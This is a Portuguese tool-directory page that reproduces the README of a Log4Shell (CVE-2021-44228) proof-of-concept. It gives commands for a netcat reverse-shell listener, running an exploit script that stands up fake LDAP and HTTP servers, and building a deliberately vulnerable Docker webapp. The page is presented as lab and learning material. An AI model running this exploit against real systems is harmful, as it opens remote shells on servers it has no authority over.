Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
LOGJ4_PocShell_CVE-2021-44228 | Kitploit
Ferramentas/GitHubGitHub/yanghyperdata/logj4_pocshell_cve-2021-44228
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubyanghyperdata/logj4_pocshell_cve-2021-44228

LOGJ4_PocShell_CVE-2021-44228

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
há 2 anosAinda não revisado

log4j-shell-poc

Uma Prova de Conceito para a vulnerabilidade CVE-2021-44228 recentemente encontrada.

Recentemente foi descoberta uma nova vulnerabilidade no log4j, uma biblioteca de logging em Java que é amplamente utilizada em projetos como elasticsearch, minecraft e muitos outros.

Neste repositório há um exemplo de aplicação vulnerável e a exploração (POC) da mesma.

Prova de conceito (POC)

Como PoC, há um arquivo Python que automatiza o processo.

Requisitos:

root@kitploit:~
pip install -r requirements.txt

Uso:

  • Inicie um listener netcat para aceitar a conexão de reverse shell.
root@kitploit:~
nc -lvnp 9001
  • Lance o exploit.
    Nota: Para que isto funcione, o arquivo Java extraído deve ser nomeado: jdk1.8.0_20, e estar no mesmo diretório.
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[+] Exploit java class created success
[+] Setting up fake LDAP server
Listening on 0.0.0.0:1389

Este script configurará o servidor HTTP e o servidor LDAP para você, e também criará o payload que pode ser usado para colar no parâmetro vulnerável. Depois disso, se tudo correr bem, você deve obter um shell na porta lport.


Aplicação vulnerável

Existe um Dockerfile com a webapp vulnerável. Você pode usá-lo seguindo os passos abaixo:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

Quando estiver em execução, você pode acessá-la em localhost:8080


Obtendo a versão do Java.

A Oracle, felizmente, fornece um arquivo com todas as versões anteriores do Java:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
Role para baixo até 8u20 e baixe os arquivos apropriados para o seu sistema operacional e hardware. Screenshot from 2021-12-11 00-09-25

Nota: Você precisa criar uma conta para conseguir baixar o pacote.

Depois de baixar e extrair o arquivo, você pode encontrar java e alguns binários relacionados em jdk1.8.0_20/bin.
Nota: Certifique-se de extrair a pasta do jdk para este repositório com o mesmo nome para que funcione.

root@kitploit:~
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

Aviso Legal

Este repositório não tem a intenção de ser um exploit de um clique para CVE-2021-44228. O objetivo deste projeto é ajudar as pessoas a aprenderem sobre essa vulnerabilidade e, talvez, testarem suas próprias aplicações (no entanto, existem aplicações melhores para esse fim, ex: https://log4shell.tools/).

Baixar ferramenta